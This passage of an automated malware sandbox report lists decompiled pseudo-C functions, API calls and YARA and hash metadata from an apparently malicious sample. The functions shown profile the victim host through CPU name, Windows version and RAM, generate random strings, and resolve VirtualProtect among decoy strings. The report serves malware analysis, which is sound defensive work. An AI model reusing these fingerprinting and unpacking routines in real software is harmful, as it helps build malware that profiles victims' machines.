                                                                                					return E00421A61(0, _t125, _t91);
                                                                                				}
                                                                                				L17:
                                                                                			}






















                                                                                APIs
                                                                                • __EH_prolog3_GS.LIBCMT ref: 0041736F
                                                                                • Sleep.KERNEL32(00000064,ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789,00000024,00000034,0040B876,00000013), ref: 004173AF
                                                                                • __time64.LIBCMT ref: 004173B6
                                                                                  • Part of subcall function 0041F6BE: GetSystemTimeAsFileTime.KERNEL32(004173BB,?,?,?,004173BB,00000000), ref: 0041F6C9
                                                                                  • Part of subcall function 0041F6BE: __aulldiv.LIBCMT ref: 0041F6E9
                                                                                  • Part of subcall function 00417319: _malloc.LIBCMT ref: 0041731F
                                                                                  • Part of subcall function 00417319: GetTickCount.KERNEL32 ref: 0041732A
                                                                                  • Part of subcall function 00417319: _rand.LIBCMT ref: 0041733F
                                                                                  • Part of subcall function 00417319: wsprintfA.USER32 ref: 00417352
                                                                                  • Part of subcall function 0041F58A: __getptd.LIBCMT ref: 0041F58F
                                                                                • _rand.LIBCMT ref: 004173E2
                                                                                  • Part of subcall function 0041F59C: __getptd.LIBCMT ref: 0041F59C
                                                                                • std::_Xinvalid_argument.LIBCPMT ref: 0041745D
                                                                                Strings
                                                                                • invalid string position, xrefs: 00417458
                                                                                • ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789, xrefs: 00417383
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time__getptd_rand$CountFileH_prolog3_SleepSystemTickXinvalid_argument__aulldiv__time64_mallocstd::_wsprintf
                                                                                • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789$invalid string position
                                                                                • API String ID: 4021585639-3173898365
                                                                                • Opcode ID: e5a0575f774059578f42c4b227a2ec8b00996334371433c7ab8e47d59f76ade4
                                                                                • Instruction ID: f9b750d0c42da020d266cd9b9ff5f8d26ac7539b86ccd1569070ce2b83a70b12
                                                                                • Opcode Fuzzy Hash: e5a0575f774059578f42c4b227a2ec8b00996334371433c7ab8e47d59f76ade4
                                                                                • Instruction Fuzzy Hash: BD319270E04205AFDB14EFA9D8825DDBBB5FF44704F20482FF551E7282D6785981CB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E00415636(void* __edi, char* __esi) {
                                                                                				void* __ebx;
                                                                                				signed int _t18;
                                                                                				void* _t37;
                                                                                				void* _t41;
                                                                                				void* _t42;
                                                                                				char* _t43;
                                                                                				signed int _t44;
                                                                                				void* _t46;
                                                                                
                                                                                				_t43 = __esi;
                                                                                				_t42 = __edi;
                                                                                				_t44 = _t46 - 0x18c;
                                                                                				_t18 =  *0x447674; // 0x4124c941
                                                                                				 *(_t44 + 0x188) = _t18 ^ _t44;
                                                                                				 *(_t44 - 0x7c) = 0;
                                                                                				 *(_t44 - 0x7c) = 0xff;
                                                                                				 *(_t44 + 0x88) = 0;
                                                                                				E00427E30(_t44 + 0x89, 0, 0xfe);
                                                                                				if(RegOpenKeyExA(0x80000002, "HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", 0, 0x20119, _t44 - 0x80) == 0) {
                                                                                					RegQueryValueExA( *(_t44 - 0x80), "ProcessorNameString", 0, 0, _t44 + 0x88, _t44 - 0x7c);
                                                                                				}
                                                                                				RegCloseKey( *(_t44 - 0x80));
                                                                                				CharToOemA(_t44 + 0x88, _t44 - 0x78);
                                                                                				 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(_t43 + 0x10)) = 0;
                                                                                				 *_t43 = 0;
                                                                                				E0040381A(_t43, _t44 - 0x78);
                                                                                				_pop(_t37);
                                                                                				return E0041DEB4(_t43, _t37,  *(_t44 + 0x188) ^ _t44, _t41, _t42, _t43);
                                                                                			}












                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00415671
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020119,?,?,?,00000000), ref: 0041568D
                                                                                • RegQueryValueExA.ADVAPI32(?,ProcessorNameString,00000000,00000000,?,?,?,?,00000000), ref: 004156AC
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 004156B5
                                                                                • CharToOemA.USER32(?,?), ref: 004156C6
                                                                                Strings
                                                                                • ProcessorNameString, xrefs: 004156A4
                                                                                • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 00415683
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CharCloseOpenQueryValue_memset
                                                                                • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString
                                                                                • API String ID: 2235053359-2804670039
                                                                                • Opcode ID: ba1ab00293c11aec3aa7fa498a02fb2cee0c446be2811ae5844238d174ba5f9a
                                                                                • Instruction ID: 69ed404512a34e2cf10b328672891c501a3ac911aa5c023b021ef7ad9592be83
                                                                                • Opcode Fuzzy Hash: ba1ab00293c11aec3aa7fa498a02fb2cee0c446be2811ae5844238d174ba5f9a
                                                                                • Instruction Fuzzy Hash: 43115EB194020CAFEB30AFA4DC85BEEBBBCEB04348F50802AF555D7152DE745A488B55
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 88%
                                                                                			E00415AA2(void* __edi, char* __esi) {
                                                                                				void* __ebx;
                                                                                				signed int _t18;
                                                                                				void* _t37;
                                                                                				void* _t41;
                                                                                				void* _t42;
                                                                                				char* _t43;
                                                                                				signed int _t44;
                                                                                				void* _t46;
                                                                                
                                                                                				_t43 = __esi;
                                                                                				_t42 = __edi;
                                                                                				_t44 = _t46 - 0x18c;
                                                                                				_t18 =  *0x447674; // 0x4124c941
                                                                                				 *(_t44 + 0x188) = _t18 ^ _t44;
                                                                                				 *(_t44 - 0x7c) = 0;
                                                                                				 *(_t44 - 0x7c) = 0xff;
                                                                                				 *(_t44 + 0x88) = 0;
                                                                                				E00427E30(_t44 + 0x89, 0, 0xfe);
                                                                                				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, 0x20119, _t44 - 0x80) == 0) {
                                                                                					RegQueryValueExA( *(_t44 - 0x80), "ProductName", 0, 0, _t44 + 0x88, _t44 - 0x7c);
                                                                                				}
                                                                                				RegCloseKey( *(_t44 - 0x80));
                                                                                				CharToOemA(_t44 + 0x88, _t44 - 0x78);
                                                                                				 *((intOrPtr*)(_t43 + 0x14)) = 0xf;
                                                                                				 *((intOrPtr*)(_t43 + 0x10)) = 0;
                                                                                				 *_t43 = 0;
                                                                                				E0040381A(_t43, _t44 - 0x78);
                                                                                				_pop(_t37);
                                                                                				return E0041DEB4(_t43, _t37,  *(_t44 + 0x188) ^ _t44, _t41, _t42, _t43);
                                                                                			}












                                                                                APIs
                                                                                • _memset.LIBCMT ref: 00415ADD
                                                                                • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00020119,?,?,?,00000000), ref: 00415AF9
                                                                                • RegQueryValueExA.ADVAPI32(?,ProductName,00000000,00000000,?,?,?,?,00000000), ref: 00415B18
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 00415B21
                                                                                • CharToOemA.USER32(?,?), ref: 00415B32
                                                                                Strings
                                                                                • ProductName, xrefs: 00415B10
                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 00415AEF
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CharCloseOpenQueryValue_memset
                                                                                • String ID: ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                • API String ID: 2235053359-1787575317
                                                                                • Opcode ID: 8f814b6ac6bc03f31c073667abdc003f177ff691aa53d4298a7e9a4e4f70b092
                                                                                • Instruction ID: 5c41df40a66fda5b461640e06a6b98bc800ee5d084a06aecff0b6f72ad2190ef
                                                                                • Opcode Fuzzy Hash: 8f814b6ac6bc03f31c073667abdc003f177ff691aa53d4298a7e9a4e4f70b092
                                                                                • Instruction Fuzzy Hash: E1112EB194024CAFEB309FA4DC85BEEBBBCEB04348F50402AF555D7151DE745A488F65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetProcAddress.KERNEL32(76C70000,VirtualProtect), ref: 00C6C10A
                                                                                  • Part of subcall function 00C639B0: __vswprintf_c_l.LIBCMT ref: 00C639CE
                                                                                • lstrcpyW.KERNEL32 ref: 00C6C0CC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508759068.0000000000C61000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C60000, based on PE: true
                                                                                • Associated: 00000011.00000002.508712302.0000000000C60000.00000002.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.509144454.0000000000C80000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511051633.0000000000DA8000.00000020.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511085555.0000000000DAC000.00000004.00000001.01000000.0000000B.sdmp
                                                                                • Associated: 00000011.00000002.511119912.0000000000DB0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_c60000_file_22613.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc__vswprintf_c_llstrcpy
                                                                                • String ID: $Gotifo gon saniyoh tihehom mexexor peloxi$Lanewoq ceve sare$VirtualProtect$Wekoyil teniloh nax dovawi yataxa hikemeb
                                                                                • API String ID: 503509527-983023147
                                                                                • Opcode ID: 363fa4308ac81a362d1169744129f2f83c218e817faf142041b6f1376ec41a57
                                                                                • Instruction ID: a0d0ad64a75265c94980812f9616db889101bbed6ce783bd98bcb83ea2e0e42f
                                                                                • Opcode Fuzzy Hash: 363fa4308ac81a362d1169744129f2f83c218e817faf142041b6f1376ec41a57
                                                                                • Instruction Fuzzy Hash: 9E2129B0D08389DFEB14CF99C985BBEBBB1AB44304F148058D5526B381D7B55B08CFA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 85%
                                                                                			E00415153(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t19;
                                                                                				void* _t24;
                                                                                				intOrPtr _t39;
                                                                                				void* _t44;
                                                                                
                                                                                				_push(0x14);
                                                                                				E00421975(E00435C03, __ebx, __edi, __esi);
                                                                                				E0041D582(_t44 - 0x14, 0);
                                                                                				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                                                                                				_t39 =  *0x44a43c; // 0x37b10a0
                                                                                				 *((intOrPtr*)(_t44 - 0x10)) = _t39;
                                                                                				_t19 = E0040F16D( *((intOrPtr*)(_t44 + 8)), E0040F10D(_t44 - 0x14, 0x448c4c));
                                                                                				_t43 = _t19;
                                                                                				if(_t19 == 0) {
                                                                                					if(_t39 == 0) {
                                                                                						_push( *((intOrPtr*)(_t44 + 8)));
                                                                                						_push(_t44 - 0x10);
                                                                                						_t24 = E0040F1BF(__ebx, _t39, _t43, __eflags);
                                                                                						__eflags = _t24 - 0xffffffff;
                                                                                						if(_t24 == 0xffffffff) {
                                                                                							E0041E1C5(_t44 - 0x20, "bad cast");
                                                                                							E00421126(_t44 - 0x20, 0x4442ac);
                                                                                						}
                                                                                						_t43 =  *((intOrPtr*)(_t44 - 0x10));
                                                                                						 *0x44a43c =  *((intOrPtr*)(_t44 - 0x10));
                                                                                						E0040F13E( *((intOrPtr*)(_t44 - 0x10)));
                                                                                						E0041D711(__eflags, _t43);
                                                                                					} else {
                                                                                						_t43 = _t39;
                                                                                					}
                                                                                				}
                                                                                				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                                                                                				E0041D5AA(_t44 - 0x14);
                                                                                				return E00421A4D(_t43);
                                                                                			}








                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 0041515A
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00415164
                                                                                  • Part of subcall function 0040F10D: std::_Lockit::_Lockit.LIBCPMT ref: 0040F11B
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 004151B3
                                                                                • __CxxThrowException@8.LIBCMT ref: 004151C1
                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 004151D1
                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 004151D7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 158301680-3145022300
                                                                                • Opcode ID: 0c18c1146e303d3250477eb122bf2e9a362c33ea7865ee22144f26caed177d09
                                                                                • Instruction ID: fe24bb0cdfa607c4d1967f0efca930ab9c7078c3bb1c8f71cade9ed0dc2268a2
                                                                                • Opcode Fuzzy Hash: 0c18c1146e303d3250477eb122bf2e9a362c33ea7865ee22144f26caed177d09
                                                                                • Instruction Fuzzy Hash: E7018E31D00625EACB11EBA1DC426ED73306F50768F60022BE820BB2E1DB7C9E458798
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E0041914C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t19;
                                                                                				void* _t23;
                                                                                				intOrPtr _t39;
                                                                                				void* _t44;
                                                                                
                                                                                				_push(0x14);
                                                                                				E00421975(E00435C03, __ebx, __edi, __esi);
                                                                                				E0041D582(_t44 - 0x14, 0);
                                                                                				 *(_t44 - 4) =  *(_t44 - 4) & 0x00000000;
                                                                                				_t39 =  *0x44a444; // 0x37b15b8
                                                                                				 *((intOrPtr*)(_t44 - 0x10)) = _t39;
                                                                                				_t19 = E0040F16D( *((intOrPtr*)(_t44 + 8)), E0040F10D(_t44 - 0x14, 0x44ac58));
                                                                                				_t43 = _t19;
                                                                                				if(_t19 == 0) {
                                                                                					if(_t39 == 0) {
                                                                                						_push( *((intOrPtr*)(_t44 + 8)));
                                                                                						_t23 = E00419284(_t44 - 0x10, __edx, _t43, __eflags);
                                                                                						__eflags = _t23 - 0xffffffff;
                                                                                						if(_t23 == 0xffffffff) {
                                                                                							E0041E1C5(_t44 - 0x20, "bad cast");
                                                                                							E00421126(_t44 - 0x20, 0x4442ac);
                                                                                						}
                                                                                						_t43 =  *((intOrPtr*)(_t44 - 0x10));
                                                                                						 *0x44a444 =  *((intOrPtr*)(_t44 - 0x10));
                                                                                						E0040F13E( *((intOrPtr*)(_t44 - 0x10)));
                                                                                						E0041D711(__eflags, _t43);
                                                                                					} else {
                                                                                						_t43 = _t39;
                                                                                					}
                                                                                				}
                                                                                				 *(_t44 - 4) =  *(_t44 - 4) | 0xffffffff;
                                                                                				E0041D5AA(_t44 - 0x14);
                                                                                				return E00421A4D(_t43);
                                                                                			}








                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 00419153
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0041915D
                                                                                  • Part of subcall function 0040F10D: std::_Lockit::_Lockit.LIBCPMT ref: 0040F11B
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 004191AA
                                                                                • __CxxThrowException@8.LIBCMT ref: 004191B8
                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 004191C8
                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 004191CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 158301680-3145022300
                                                                                • Opcode ID: 7c73b212e5d903ebed51fa4634109b466a8aef8befe43c9a008ffedd3640a4ea
                                                                                • Instruction ID: 6e793c7f693eafb92b2f1e4c69a61cd9008c6e99dc61860fa0b33d6efeadfa00
                                                                                • Opcode Fuzzy Hash: 7c73b212e5d903ebed51fa4634109b466a8aef8befe43c9a008ffedd3640a4ea
                                                                                • Instruction Fuzzy Hash: 7301C071940129ABDB10EB61DC566ED73706F10768F54022EF8207B2E1DB7C8E85879D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E004191E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t19;
                                                                                				void* _t23;
                                                                                				intOrPtr _t38;
                                                                                				void* _t43;
                                                                                
                                                                                				_push(0x14);
                                                                                				E00421975(E00435C03, __ebx, __edi, __esi);
                                                                                				E0041D582(_t43 - 0x14, 0);
                                                                                				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
                                                                                				_t38 =  *0x44a448; // 0x37b15e0
                                                                                				 *((intOrPtr*)(_t43 - 0x10)) = _t38;
                                                                                				_t19 = E0040F16D( *((intOrPtr*)(_t43 + 8)), E0040F10D(_t43 - 0x14, 0x44ac5c));
                                                                                				_t42 = _t19;
                                                                                				if(_t19 == 0) {
                                                                                					if(_t38 == 0) {
                                                                                						_push( *((intOrPtr*)(_t43 + 8)));
                                                                                						_t23 = E00419309(_t43 - 0x10, _t42, __eflags);
                                                                                						__eflags = _t23 - 0xffffffff;
                                                                                						if(_t23 == 0xffffffff) {
                                                                                							E0041E1C5(_t43 - 0x20, "bad cast");
                                                                                							E00421126(_t43 - 0x20, 0x4442ac);
                                                                                						}
                                                                                						_t42 =  *((intOrPtr*)(_t43 - 0x10));
                                                                                						 *0x44a448 =  *((intOrPtr*)(_t43 - 0x10));
                                                                                						E0040F13E( *((intOrPtr*)(_t43 - 0x10)));
                                                                                						E0041D711(__eflags, _t42);
                                                                                					} else {
                                                                                						_t42 = _t38;
                                                                                					}
                                                                                				}
                                                                                				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
                                                                                				E0041D5AA(_t43 - 0x14);
                                                                                				return E00421A4D(_t42);
                                                                                			}








                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 004191EF
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 004191F9
                                                                                  • Part of subcall function 0040F10D: std::_Lockit::_Lockit.LIBCPMT ref: 0040F11B
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 00419246
                                                                                • __CxxThrowException@8.LIBCMT ref: 00419254
                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 00419264
                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 0041926A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 158301680-3145022300
                                                                                • Opcode ID: 18315f0849abbcf9c4bc0f4ff04ff5327509c40e9d3e25fa2dda257022faad94
                                                                                • Instruction ID: bb5d8e8de63ca5ab58095220fe5bed3a7b1b0126a0e4fce9aaf95c8c6aff3a7e
                                                                                • Opcode Fuzzy Hash: 18315f0849abbcf9c4bc0f4ff04ff5327509c40e9d3e25fa2dda257022faad94
                                                                                • Instruction Fuzzy Hash: B601C431D40124ABCB10EB61DC526ED73306F10768F60066AF8207B2D1DB7C5E85879D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E004151F1(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                				intOrPtr _t19;
                                                                                				void* _t23;
                                                                                				intOrPtr _t38;
                                                                                				void* _t43;
                                                                                
                                                                                				_push(0x14);
                                                                                				E00421975(E00435C03, __ebx, __edi, __esi);
                                                                                				E0041D582(_t43 - 0x14, 0);
                                                                                				 *(_t43 - 4) =  *(_t43 - 4) & 0x00000000;
                                                                                				_t38 =  *0x44a440; // 0x0
                                                                                				 *((intOrPtr*)(_t43 - 0x10)) = _t38;
                                                                                				_t19 = E0040F16D( *((intOrPtr*)(_t43 + 8)), E0040F10D(_t43 - 0x14, 0x44ac54));
                                                                                				_t42 = _t19;
                                                                                				if(_t19 == 0) {
                                                                                					if(_t38 == 0) {
                                                                                						_push( *((intOrPtr*)(_t43 + 8)));
                                                                                						_t23 = E0041528D(_t43 - 0x10, _t42, __eflags);
                                                                                						__eflags = _t23 - 0xffffffff;
                                                                                						if(_t23 == 0xffffffff) {
                                                                                							E0041E1C5(_t43 - 0x20, "bad cast");
                                                                                							E00421126(_t43 - 0x20, 0x4442ac);
                                                                                						}
                                                                                						_t42 =  *((intOrPtr*)(_t43 - 0x10));
                                                                                						 *0x44a440 =  *((intOrPtr*)(_t43 - 0x10));
                                                                                						E0040F13E( *((intOrPtr*)(_t43 - 0x10)));
                                                                                						E0041D711(__eflags, _t42);
                                                                                					} else {
                                                                                						_t42 = _t38;
                                                                                					}
                                                                                				}
                                                                                				 *(_t43 - 4) =  *(_t43 - 4) | 0xffffffff;
                                                                                				E0041D5AA(_t43 - 0x14);
                                                                                				return E00421A4D(_t42);
                                                                                			}








                                                                                APIs
                                                                                • __EH_prolog3.LIBCMT ref: 004151F8
                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00415202
                                                                                  • Part of subcall function 0040F10D: std::_Lockit::_Lockit.LIBCPMT ref: 0040F11B
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 0041524F
                                                                                • __CxxThrowException@8.LIBCMT ref: 0041525D
                                                                                • std::locale::facet::_Incref.LIBCPMT ref: 0041526D
                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 00415273
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prolog3IncrefRegisterThrowstd::bad_exception::bad_exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 158301680-3145022300
                                                                                • Opcode ID: 43ebfc5e4479da13a5ba4c7bf0b6d3be70f91e6de8530bd2fa91cfc17dc6485f
                                                                                • Instruction ID: c875c72b6e774d6aa8dbb0c19a26dc0e7a87a73fa6513ac8c9be47a6431904dc
                                                                                • Opcode Fuzzy Hash: 43ebfc5e4479da13a5ba4c7bf0b6d3be70f91e6de8530bd2fa91cfc17dc6485f
                                                                                • Instruction Fuzzy Hash: 0B018472940625DBCF10EB61DD426ED73306F54768F50026AF8207B2D1DB7C5E458B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0041599F(void* __ebx, void* __edx, void* __edi, void* __esi) {
                                                                                				signed int _v8;
                                                                                				unsigned int _v64;
                                                                                				signed int _v68;
                                                                                				char _v76;
                                                                                				void* _v80;
                                                                                				signed int _t17;
                                                                                				struct _MEMORYSTATUSEX* _t23;
                                                                                				unsigned int _t24;
                                                                                				unsigned int _t29;
                                                                                				void* _t30;
                                                                                				signed int _t31;
                                                                                				void* _t36;
                                                                                				void* _t37;
                                                                                				void* _t38;
                                                                                				signed int _t39;
                                                                                
                                                                                				_t38 = __esi;
                                                                                				_t37 = __edi;
                                                                                				_t36 = __edx;
                                                                                				_t30 = __ebx;
                                                                                				_t17 =  *0x447674; // 0x4124c941
                                                                                				_v8 = _t17 ^ _t39;
                                                                                				_v80 = _v80 & 0x00000000;
                                                                                				_v80 = HeapAlloc(GetProcessHeap(), 0, 0x104);
                                                                                				E00427E30( &_v76, 0, 0x40);
                                                                                				_t23 =  &_v76;
                                                                                				_v76 = 0x40;
                                                                                				GlobalMemoryStatusEx(_t23);
                                                                                				if(_t23 != 1) {
                                                                                					_t31 = 0;
                                                                                					_t24 = 0;
                                                                                				} else {
                                                                                					_t29 = _v64;
                                                                                					_t31 = (_t29 << 0x00000020 | _v68) >> 0x14;
                                                                                					_t24 = _t29 >> 0x14;
                                                                                				}
                                                                                				wsprintfA(_v80, "%d MB", _t31);
                                                                                				E0040C606(_t30, _v80);
                                                                                				return E0041DEB4(_t30, _t30, _v8 ^ _t39, _t36, _t37, _t38, _t24);
                                                                                			}



















                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 004159BA
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004159C1
                                                                                • _memset.LIBCMT ref: 004159D2
                                                                                • GlobalMemoryStatusEx.KERNEL32(?), ref: 004159E5
                                                                                • wsprintfA.USER32 ref: 00415A0D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Heap$AllocGlobalMemoryProcessStatus_memsetwsprintf
                                                                                • String ID: %d MB$@
                                                                                • API String ID: 3402858368-3474575989
                                                                                • Opcode ID: 21b5015eed96d8b2f0c786e3da0a9527452dd9c346370e6a9420be8e0ce5cb8e
                                                                                • Instruction ID: 132e4d91e79677ea5f4a97a9146bdc09f983337fcba31e7f33af261b7e253cb1
                                                                                • Opcode Fuzzy Hash: 21b5015eed96d8b2f0c786e3da0a9527452dd9c346370e6a9420be8e0ce5cb8e
                                                                                • Instruction Fuzzy Hash: C601B5B1E40208EBDB04DFF4DD4ABEEBBB5EF04308F40013AF512E6291DA7998558B59
